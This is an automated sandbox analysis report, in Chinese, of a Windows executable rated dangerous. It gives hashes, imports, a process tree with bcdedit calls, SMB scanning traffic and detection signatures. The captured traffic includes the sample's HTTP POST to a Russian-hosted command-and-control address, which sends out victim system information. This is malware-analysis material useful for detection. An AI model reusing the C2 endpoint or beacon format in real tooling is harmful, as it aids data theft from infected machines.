恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-shaapp02-2	2024-04-18 10:32:01	2024-04-18 10:34:13	132 秒

魔盾分数

10.0

危险的

文件详细信息

文件名	x.exe
文件大小	489984 字节
文件类型	PE32+ executable (GUI) x86-64, for MS Windows
MD5	9f908f344ec041cc1ebe5324da2cf183
SHA1	ec06c0d4c38acdd61e2bf940ae70b98a4661a08a
SHA256	2f5fac1ababd213d8010eda9ccb5320f25fd0f2e95bb86154bf7e8bcad6fc4dc
SHA512	494d4184e6e31af9b5dc04fcd807456899f789069b487e7a7e56b2d9dbba2f47427b1c477ceab454713a1b380d155fe1396ddc9d93e966755941668588d16c17
CRC32	AD51AAFC
Ssdeep	6144:20wmbI4/D4SHvrxw6zaIST1w9wEPDasWxxsBhS37b8o6XCFyPwCMa6ynkxq/y:Vzv66zaISTW9asWxxAh4IlXC4PUyMq/
Yara	登录查看Yara规则
	找不到该样本提交误报

登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
否	104.26.13.205	美国
是	91.215.85.142	俄罗斯

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
api.ipify.org	A 104.26.13.205 A 172.67.74.152 A 104.26.12.205

摘要

登录查看详细行为信息

PE 信息

初始地址	0x140000000
入口地址	0x14002cbe4
声明校验值	0x00000000
实际校验值	0x00080cb7
最低操作系统版本要求	6.0
编译时间	2024-03-11 11:22:35
载入哈希	cbe53f46121d600d26965890ee97a94a

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x000515e0	0x00051600	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.57
.rdata	0x00053000	0x0001f2a6	0x0001f400	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	5.06
.data	0x00073000	0x00008644	0x00001c00	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	3.49
.pdata	0x0007c000	0x00003b28	0x00003c00	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	5.68
_RDATA	0x00080000	0x000001f4	0x00000200	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	4.20
.reloc	0x00081000	0x0000102c	0x00001200	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_DISCARDABLE\|IMAGE_SCN_MEM_READ	5.22

导入

库: KERNEL32.dll:

• 0x1400530f8 TerminateThread

• 0x140053100 LoadLibraryA

• 0x140053108 CloseHandle

• 0x140053110 GetNativeSystemInfo

• 0x140053118 CreateThread

• 0x140053120 SetVolumeMountPointW

• 0x140053128 GetProcAddress

• 0x140053130 LocalFree

• 0x140053138 DeleteCriticalSection

• 0x140053140 ExitProcess

• 0x140053148 GetCurrentProcessId

• 0x140053150 GetModuleHandleW

• 0x140053158 CopyFileW

• 0x140053160 GetVolumePathNamesForVolumeNameW

• 0x140053168 lstrcpyW

• 0x140053170 SleepEx

• 0x140053178 GetDiskFreeSpaceExA

• 0x140053180 CreateEventA

• 0x140053188 FindNextVolumeW

• 0x140053190 lstrcmpiW

• 0x140053198 CreateIoCompletionPort

• 0x1400531a0 GetTickCount

• 0x1400531a8 lstrcmpW

• 0x1400531b0 GetDriveTypeW

• 0x1400531b8 GetComputerNameA

• 0x1400531c0 TerminateProcess

• 0x1400531c8 OpenProcess

• 0x1400531d0 CreateToolhelp32Snapshot

• 0x1400531d8 Process32NextW

• 0x1400531e0 QueryDosDeviceW

• 0x1400531e8 GetFinalPathNameByHandleW

• 0x1400531f0 K32GetModuleFileNameExW

• 0x1400531f8 DuplicateHandle

• 0x140053200 CreateEventW

• 0x140053208 GetWindowsDirectoryW

• 0x140053210 FindVolumeClose

• 0x140053218 GetFileType

• 0x140053220 GetTickCount64

• 0x140053228 GetCurrentThread

• 0x140053230 GetSystemTimeAsFileTime

• 0x140053238 ReadFile

• 0x140053240 GetFileSizeEx

• 0x140053248 SetEndOfFile

• 0x140053250 SetFileAttributesW

• 0x140053258 SetFilePointerEx

• 0x140053260 SleepConditionVariableCS

• 0x140053268 WakeConditionVariable

• 0x140053270 InitializeConditionVariable

• 0x140053278 GetSystemInfo

• 0x140053280 GlobalMemoryStatusEx

• 0x140053288 WriteConsoleW

• 0x140053290 ReadConsoleW

• 0x140053298 HeapSize

• 0x1400532a0 GetConsoleMode

• 0x1400532a8 GetConsoleOutputCP

• 0x1400532b0 FlushFileBuffers

• 0x1400532b8 GetDiskFreeSpaceExW

• 0x1400532c0 SetEvent

• 0x1400532c8 GetLastError

• 0x1400532d0 Sleep

• 0x1400532d8 MultiByteToWideChar

• 0x1400532e0 PostQueuedCompletionStatus

• 0x1400532e8 GetLocaleInfoA

• 0x1400532f0 GetModuleHandleA

• 0x1400532f8 GetCurrentThreadId

• 0x140053300 GetFileAttributesW

• 0x140053308 CreateFileW

• 0x140053310 WaitForSingleObject

• 0x140053318 FindClose

• 0x140053320 lstrlenA

• 0x140053328 GetQueuedCompletionStatus

• 0x140053330 SetErrorMode

• 0x140053338 InitializeCriticalSection

• 0x140053340 LeaveCriticalSection

• 0x140053348 WaitForMultipleObjects

• 0x140053350 GetModuleFileNameW

• 0x140053358 GetUserDefaultLangID

• 0x140053360 WriteFile

• 0x140053368 lstrlenW

• 0x140053370 GetCurrentProcess

• 0x140053378 FindNextFileW

• 0x140053380 GetCommandLineW

• 0x140053388 EnterCriticalSection

• 0x140053390 FindFirstVolumeW

• 0x140053398 FindFirstFileExW

• 0x1400533a0 GetLogicalDrives

• 0x1400533a8 MoveFileW

• 0x1400533b0 OutputDebugStringW

• 0x1400533b8 SetStdHandle

• 0x1400533c0 GetProcessHeap

• 0x1400533c8 FreeEnvironmentStringsW

• 0x1400533d0 GetEnvironmentStringsW

• 0x1400533d8 GetCommandLineA

• 0x1400533e0 GetOEMCP

• 0x1400533e8 GetACP

• 0x1400533f0 IsValidCodePage

• 0x1400533f8 EnumSystemLocalesW

• 0x140053400 GetUserDefaultLCID

• 0x140053408 IsValidLocale

• 0x140053410 GetLocaleInfoW

• 0x140053418 LCMapStringW

• 0x140053420 FlsFree

• 0x140053428 QueryPerformanceCounter

• 0x140053430 lstrcatW

• 0x140053438 FlsSetValue

• 0x140053440 FlsGetValue

• 0x140053448 FlsAlloc

• 0x140053450 HeapAlloc

• 0x140053458 HeapFree

• 0x140053460 HeapReAlloc

• 0x140053468 GetStdHandle

• 0x140053470 GetModuleHandleExW

• 0x140053478 LoadLibraryExW

• 0x140053480 FreeLibrary

• 0x140053488 TlsFree

• 0x140053490 TlsSetValue

• 0x140053498 RtlCaptureContext

• 0x1400534a0 RtlLookupFunctionEntry

• 0x1400534a8 RtlVirtualUnwind

• 0x1400534b0 UnhandledExceptionFilter

• 0x1400534b8 SetUnhandledExceptionFilter

• 0x1400534c0 IsProcessorFeaturePresent

• 0x1400534c8 ReleaseSRWLockExclusive

• 0x1400534d0 AcquireSRWLockExclusive

• 0x1400534d8 WakeAllConditionVariable

• 0x1400534e0 SleepConditionVariableSRW

• 0x1400534e8 IsDebuggerPresent

• 0x1400534f0 GetStartupInfoW

• 0x1400534f8 InitializeSListHead

• 0x140053500 GetStringTypeW

• 0x140053508 WideCharToMultiByte

• 0x140053510 InitializeCriticalSectionEx

• 0x140053518 EncodePointer

• 0x140053520 DecodePointer

• 0x140053528 LCMapStringEx

• 0x140053530 GetCPInfo

• 0x140053538 RtlUnwindEx

• 0x140053540 RtlPcToFileHeader

• 0x140053548 RaiseException

• 0x140053550 SetLastError

• 0x140053558 InitializeCriticalSectionAndSpinCount

• 0x140053560 TlsAlloc

• 0x140053568 TlsGetValue

库: USER32.dll:

• 0x1400535f8 DefWindowProcW

• 0x140053600 GetCursorPos

• 0x140053608 CreateWindowExW

• 0x140053610 RegisterClassW

• 0x140053618 MessageBoxW

库: ADVAPI32.dll:

• 0x140053000 OpenServiceW

• 0x140053008 CryptReleaseContext

• 0x140053010 OpenThreadToken

• 0x140053018 AllocateAndInitializeSid

• 0x140053020 SetEntriesInAclW

• 0x140053028 SetNamedSecurityInfoW

• 0x140053030 FreeSid

• 0x140053038 ControlService

• 0x140053040 EnumDependentServicesW

• 0x140053048 QueryServiceConfigW

• 0x140053050 ChangeServiceConfigW

• 0x140053058 EnumServicesStatusW

• 0x140053060 QueryServiceStatusEx

• 0x140053068 LookupPrivilegeValueW

• 0x140053070 AdjustTokenPrivileges

• 0x140053078 CreateServiceW

• 0x140053080 RegCloseKey

• 0x140053088 CryptAcquireContextW

• 0x140053090 CloseServiceHandle

• 0x140053098 RegQueryValueExA

• 0x1400530a0 CryptGenRandom

• 0x1400530a8 OpenSCManagerW

• 0x1400530b0 RegSetValueExW

• 0x1400530b8 OpenProcessToken

• 0x1400530c0 StartServiceW

• 0x1400530c8 RegOpenKeyExA

• 0x1400530d0 RegOpenKeyExW

• 0x1400530d8 GetTokenInformation

库: SHELL32.dll:

• 0x140053590 CommandLineToArgvW

• 0x140053598 ShellExecuteW

库: bcrypt.dll:

• 0x140053690 BCryptGenRandom

库: NETAPI32.dll:

• 0x140053578 NetShareEnum

• 0x140053580 NetApiBufferFree

库: SHLWAPI.dll:

• 0x1400535a8 wnsprintfA

• 0x1400535b0 StrCmpNIW

• 0x1400535b8 StrCmpNW

• 0x1400535c0 StrStrIW

• 0x1400535c8 PathFileExistsW

• 0x1400535d0 SHDeleteKeyW

• 0x1400535d8 UrlUnescapeA

• 0x1400535e0 UrlEscapeA

• 0x1400535e8 wnsprintfW

库: IPHLPAPI.DLL:

• 0x1400530e8 GetIpNetTable

库: WS2_32.dll:

• 0x140053680 inet_ntoa

库: WININET.dll:

• 0x140053628 InternetQueryOptionW

• 0x140053630 HttpOpenRequestW

• 0x140053638 InternetOpenW

• 0x140053640 InternetCloseHandle

• 0x140053648 InternetConnectW

• 0x140053650 InternetSetOptionW

• 0x140053658 HttpSendRequestW

• 0x140053660 InternetCrackUrlW

• 0x140053668 InternetReadFile

• 0x140053670 InternetQueryDataAvailable

.text
`.rdata
@.data
.pdata
@_RDATA
@.reloc
unknown
D$DE9e
D$DA;E

没有防病毒引擎扫描信息!

进程树

x.exe id: 2644
- cmd.exe id: 2844
  - bcdedit.exe id: 2960
- cmd.exe id: 2896
  - bcdedit.exe id: 3016

x.exe, PID: 2644, 上一级进程 PID: 2268

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

cmd.exe, PID: 2844, 上一级进程 PID: 2644

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

cmd.exe, PID: 2896, 上一级进程 PID: 2644

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

bcdedit.exe, PID: 2960, 上一级进程 PID: 2844

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

bcdedit.exe, PID: 3016, 上一级进程 PID: 2896

缺省注册表文件系统网络进程线程服务设备同步加密浏览器全部

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接	IP	安全评级	地理位置
否	104.26.13.205	美国
是	91.215.85.142	俄罗斯

TCP

源地址	源端口	目标地址	目标端口
192.168.122.202	49166	104.26.13.205 api.ipify.org	80
192.168.122.202	49181	192.168.122.201	445
192.168.122.202	49182	192.168.122.201	445
192.168.122.202	49183	192.168.122.201	445
192.168.122.202	49184	192.168.122.201	445
192.168.122.202	49185	192.168.122.201	445
192.168.122.202	49186	192.168.122.201	445
192.168.122.202	49187	192.168.122.201	445
192.168.122.202	49188	192.168.122.201	445
192.168.122.202	49189	192.168.122.201	445
192.168.122.202	49190	192.168.122.201	445
192.168.122.202	49191	192.168.122.201	445
192.168.122.202	49192	192.168.122.201	445
192.168.122.202	49193	192.168.122.201	445
192.168.122.202	49194	192.168.122.201	135
192.168.122.202	49195	192.168.122.201	49156
192.168.122.202	49196	192.168.122.201	445
192.168.122.202	49197	192.168.122.201	445
192.168.122.202	49198	192.168.122.201	445
192.168.122.202	49199	192.168.122.201	445
192.168.122.202	49200	192.168.122.201	445
192.168.122.202	49201	192.168.122.201	445
192.168.122.202	49202	192.168.122.201	445
192.168.122.202	49203	192.168.122.201	445
192.168.122.202	49204	192.168.122.201	445
192.168.122.202	49205	192.168.122.201	445
192.168.122.202	49206	192.168.122.201	445
192.168.122.202	49207	192.168.122.201	445
192.168.122.202	49208	192.168.122.201	445
192.168.122.202	49209	192.168.122.201	445
192.168.122.202	49210	192.168.122.201	445
192.168.122.202	49211	192.168.122.201	445
192.168.122.202	49212	192.168.122.201	49156
192.168.122.202	49213	192.168.122.201	445
192.168.122.202	49215	192.168.122.201	445
192.168.122.202	49157	23.206.229.110	80
192.168.122.202	49167	91.215.85.142	80
192.168.122.202	49170	91.215.85.142	80
192.168.122.202	49179	91.215.85.142	80
192.168.122.202	49214	91.215.85.142	80
192.168.122.202	49219	91.215.85.142	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.202	60917	192.168.122.1	53
192.168.122.202	63030	192.168.122.1	53

域名解析 (可点击查询WPING实时安全评级)

域名	安全评级	响应
api.ipify.org	A 104.26.13.205 A 172.67.74.152 A 104.26.12.205

TCP

源地址	源端口	目标地址	目标端口
192.168.122.202	49166	104.26.13.205 api.ipify.org	80
192.168.122.202	49181	192.168.122.201	445
192.168.122.202	49182	192.168.122.201	445
192.168.122.202	49183	192.168.122.201	445
192.168.122.202	49184	192.168.122.201	445
192.168.122.202	49185	192.168.122.201	445
192.168.122.202	49186	192.168.122.201	445
192.168.122.202	49187	192.168.122.201	445
192.168.122.202	49188	192.168.122.201	445
192.168.122.202	49189	192.168.122.201	445
192.168.122.202	49190	192.168.122.201	445
192.168.122.202	49191	192.168.122.201	445
192.168.122.202	49192	192.168.122.201	445
192.168.122.202	49193	192.168.122.201	445
192.168.122.202	49194	192.168.122.201	135
192.168.122.202	49195	192.168.122.201	49156
192.168.122.202	49196	192.168.122.201	445
192.168.122.202	49197	192.168.122.201	445
192.168.122.202	49198	192.168.122.201	445
192.168.122.202	49199	192.168.122.201	445
192.168.122.202	49200	192.168.122.201	445
192.168.122.202	49201	192.168.122.201	445
192.168.122.202	49202	192.168.122.201	445
192.168.122.202	49203	192.168.122.201	445
192.168.122.202	49204	192.168.122.201	445
192.168.122.202	49205	192.168.122.201	445
192.168.122.202	49206	192.168.122.201	445
192.168.122.202	49207	192.168.122.201	445
192.168.122.202	49208	192.168.122.201	445
192.168.122.202	49209	192.168.122.201	445
192.168.122.202	49210	192.168.122.201	445
192.168.122.202	49211	192.168.122.201	445
192.168.122.202	49212	192.168.122.201	49156
192.168.122.202	49213	192.168.122.201	445
192.168.122.202	49215	192.168.122.201	445
192.168.122.202	49157	23.206.229.110	80
192.168.122.202	49167	91.215.85.142	80
192.168.122.202	49170	91.215.85.142	80
192.168.122.202	49179	91.215.85.142	80
192.168.122.202	49214	91.215.85.142	80
192.168.122.202	49219	91.215.85.142	80

UDP

源地址	源端口	目标地址	目标端口
192.168.122.202	60917	192.168.122.1	53
192.168.122.202	63030	192.168.122.1	53

HTTP 请求

URI	HTTP数据
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip	GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: / If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache
URL专业沙箱检测 -> http://api.ipify.org/	GET / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache
URL专业沙箱检测 -> http://91.215.85.142/QWEwqdsvsf/ap.php	POST /QWEwqdsvsf/ap.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.215.85.142 Content-Length: 164 Connection: Keep-Alive Cache-Control: no-cache user=hiervos&TargetID=FB3A2FFF081DFC7778C92B2A&SystemInformation=Windows%207%20Ultimate%20x64,%20CN,%20114.80.207.43,%20TEST-PC&max_size_of_file=0.0&size_of_hdd=460

URI

HTTP数据

URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip

GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

URL专业沙箱检测 -> http://api.ipify.org/

GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache

URL专业沙箱检测 -> http://91.215.85.142/QWEwqdsvsf/ap.php

POST /QWEwqdsvsf/ap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 91.215.85.142
Content-Length: 164
Connection: Keep-Alive
Cache-Control: no-cache

user=hiervos&TargetID=FB3A2FFF081DFC7778C92B2A&SystemInformation=Windows%207%20Ultimate%20x64,%20CN,%20114.80.207.43,%20TEST-PC&max_size_of_file=0.0&size_of_hdd=460

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

源地址	目标地址	ICMP类型	数据
192.168.122.1	192.168.122.202	3
192.168.122.1	192.168.122.202	3
192.168.122.1	192.168.122.202	3
192.168.122.202	224.0.0.22	8	ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI
192.168.122.202	224.0.0.22	8	ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI

CIF 报告

无 CIF 结果

网络警报

Timestamp	Source IP	Source Port	Destination IP	Destination Port	Protocol	SID	Signature	Category
2024-04-18 10:33:01.716817+0800	192.168.122.202	49183	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:04.704922+0800	192.168.122.202	49189	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:01.975674+0800	192.168.122.202	49184	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:02.426289+0800	192.168.122.202	49186	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.204955+0800	192.168.122.202	49201	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.575738+0800	192.168.122.202	49203	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:06.080198+0800	192.168.122.202	49196	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.491075+0800	192.168.122.202	49206	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:01.102959+0800	192.168.122.202	49181	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:03.369152+0800	192.168.122.202	49188	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.013350+0800	192.168.122.202	49199	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:01.586296+0800	192.168.122.202	49182	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.772515+0800	192.168.122.202	49209	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:05.015223+0800	192.168.122.202	49191	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:04.997937+0800	192.168.122.202	49190	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:05.210320+0800	192.168.122.202	49193	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.117725+0800	192.168.122.202	49200	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.309359+0800	192.168.122.202	49202	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:08.420670+0800	192.168.122.202	49205	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.853009+0800	192.168.122.202	49210	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:10.244043+0800	192.168.122.202	49213	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:02.726840+0800	192.168.122.202	49187	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:06.390982+0800	192.168.122.202	49197	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.665136+0800	192.168.122.202	49207	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:06.805403+0800	192.168.122.202	49198	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.761679+0800	192.168.122.202	49208	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:10.617587+0800	192.168.122.202	49215	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:32:37.437111+0800	192.168.122.202	49166	104.26.13.205	80	TCP	2021997	ET POLICY External IP Lookup api.ipify.org	Potential Corporate Privacy Violation
2024-04-18 10:33:05.106567+0800	192.168.122.202	49192	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:07.806057+0800	192.168.122.202	49204	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:02.144656+0800	192.168.122.202	49185	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
2024-04-18 10:33:09.860449+0800	192.168.122.202	49211	192.168.122.201	445	TCP	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

抱歉! 没有任何文件投放。

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 37.632 seconds )

15.107 BehaviorAnalysis
10.671 Suricata
9.43 NetworkAnalysis
1.76 Static
0.343 TargetInfo
0.298 peid
0.011 Strings
0.01 AnalysisInfo
0.002 Memory

Signatures ( 58.793 seconds )

48.072 network_http
1.394 proprietary_url_bl
0.734 api_spamming
0.695 mimics_filetime
0.646 antiav_detectfile
0.617 infostealer_bitcoin
0.578 stealth_timeout
0.556 reads_self
0.52 virus
0.518 stealth_decoy_document
0.452 antivm_generic_disk
0.445 bootkit
0.434 stealth_file
0.323 infostealer_ftp
0.28 antivm_vbox_files
0.249 infostealer_im
0.213 hancitor_behavior
0.17 ransomware_extensions
0.133 infostealer_mail
0.127 antidbg_devices
0.095 rat_pcclient
0.09 ransomware_files
0.079 antivm_vmware_files
0.076 proprietary_malicious_write_executeable_under_temp_to_regrun
0.071 network_tor
0.068 proprietary_anomaly_write_exe_and_obsfucate_extension
0.063 proprietary_anomaly_massive_file_ops
0.062 antianalysis_detectfile
0.055 ransomware_message
0.053 antiav_detectreg
0.051 sets_autoconfig_url
0.046 securityxploded_modules
0.043 betabot_behavior
0.043 geodo_banking_trojan
0.042 codelux_behavior
0.04 kazybot_behavior
0.039 proprietary_anomaly_write_exe_and_dll_under_winroot_run
0.039 banker_cridex
0.038 antivm_vpc_files
0.036 ipc_namedpipe
0.031 hawkeye_behavior
0.031 kibex_behavior
0.03 sniffer_winpcap
0.029 disables_wfp
0.026 disables_spdy
0.024 rat_luminosity
0.022 malicous_targeted_flame
0.021 bitcoin_opencl
0.02 proprietary_anomaly_terminated_process
0.02 office_dl_write_exe
0.02 network_tor_service
0.017 office_write_exe
0.017 anomaly_persistence_autorun
0.014 rat_nanocore
0.014 antisandbox_sunbelt_files
0.011 shifu_behavior
0.011 antianalysis_detectreg
0.011 antivm_vbox_devices
0.01 spreading_autoruninf
0.009 antivm_vmware_devices
0.009 proprietary_domain_bl
0.008 tinba_behavior
0.008 infostealer_browser
0.007 antisandbox_fortinet_files
0.007 antisandbox_threattrack_files
0.006 antiav_servicestop
0.006 disables_browser_warn
0.005 ransomware_file_modifications
0.005 anomaly_persistence_ads
0.005 antisandbox_cuckoo_files
0.004 cerber_behavior
0.004 antisandbox_joe_anubis_files
0.004 browser_security
0.004 proprietary_malicious_drop_executable_file_to_temp_folder
0.003 infostealer_browser_password
0.003 bot_drive
0.003 bot_drive2
0.003 modify_proxy
0.003 ransomware_radamant
0.002 injection_createremotethread
0.002 modifies_hostfile
0.002 antivm_xen_keys
0.002 browser_addon
0.002 disables_system_restore
0.002 network_torgateway
0.001 injection_explorer
0.001 stealth_network
0.001 injection_runpe
0.001 kovter_behavior
0.001 antivm_parallels_keys
0.001 banker_zeus_mutex
0.001 bot_athenahttp
0.001 disables_windows_defender
0.001 proprietary_bad_drop
0.001 network_cnc_http
0.001 stealth_modify_uac_prompt

Reporting ( 0.731 seconds )

0.58 ReportHTMLSummary
0.151 Malheur


Task ID	744066
Mongo ID	6620874cdc327b6545622f87
Cuckoo release	1.4-Maldun